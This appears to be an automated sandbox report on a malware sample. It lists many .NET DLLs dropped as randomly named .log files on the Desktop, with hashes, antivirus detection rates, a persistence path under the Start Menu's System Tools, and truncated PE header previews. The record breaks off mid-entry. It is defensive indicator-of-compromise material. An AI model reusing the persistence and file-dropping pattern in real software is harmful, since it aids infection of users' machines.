                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\BpxnzmkL.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ByUnjZDH.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\CJDckQCP.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\CUHLiuul.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\CYbeNrdN.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\CYcTTrrX.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\CjKdtCCI.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\CwClOmSr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\DAfcAdjS.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\DBTJGhcJ.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\DDuvcNgQ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\DMSuMAAN.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\DUVDVzTj.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\DVEbprGR.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\DXOleQyG.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\DqCnHdQh.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\DswJWuJN.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\EVCmjrsI.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\EeGvsrMf.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
